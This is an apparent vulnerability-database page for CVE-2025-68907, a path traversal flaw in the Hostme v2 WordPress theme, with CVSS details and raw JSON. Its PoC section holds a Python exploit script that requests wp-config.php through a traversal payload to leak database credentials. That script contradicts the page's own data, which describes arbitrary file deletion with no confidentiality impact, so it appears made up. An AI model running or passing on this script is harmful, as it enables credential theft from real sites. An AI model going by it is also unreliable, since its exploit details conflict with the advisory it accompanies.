Security Vulnerability Report
中文
CVE-2025-68907 CVSS 7.5 HIGH

CVE-2025-68907

Published: 2026-01-22 17:16:15
Last Modified: 2026-04-27 21:16:23

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Hostme v2 hostmev2 allows Path Traversal.This issue affects Hostme v2: from n/a through <= 7.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Hostme v2 <= 7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68907 PoC - Path Traversal in Hostme v2 # Target: WordPress Hostme v2 Theme <= 7.0 import requests import urllib.parse target_url = "http://target-site.com/wp-content/themes/hostmev2/" # Path traversal payload to read wp-config.php payload = "..\..\..\..\..\wp-config.php" encoded_payload = urllib.parse.quote(payload) # Construct the malicious URL exploit_url = f"{target_url}includes/file.php?file={encoded_payload}" print(f"[*] Exploiting CVE-2025-68907") print(f"[*] Target: {target_url}") print(f"[*] Payload: {payload}") try: response = requests.get(exploit_url, timeout=10) if response.status_code == 200: if 'DB_NAME' in response.text or 'DB_USER' in response.text: print("[+] VULNERABLE! Configuration file contents:") print(response.text[:500]) else: print("[*] Response received but may not be wp-config.php") print(response.text[:200]) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68907", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:14.603", "lastModified": "2026-04-27T21:16:22.967", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Hostme v2 hostmev2 allows Path Traversal.This issue affects Hostme v2: from n/a through <= 7.0."}, {"lang": "es", "value": "Vulnerabilidad de Limitación Inadecuada de un Nombre de Ruta a un Directorio Restringido ('Salto de Ruta') en AivahThemes Hostme v2 hostmev2 permite Salto de Ruta. Este problema afecta a Hostme v2: desde n/d hasta &lt;= 7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/hostmev2/vulnerability/wordpress-hostme-v2-theme-7-0-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}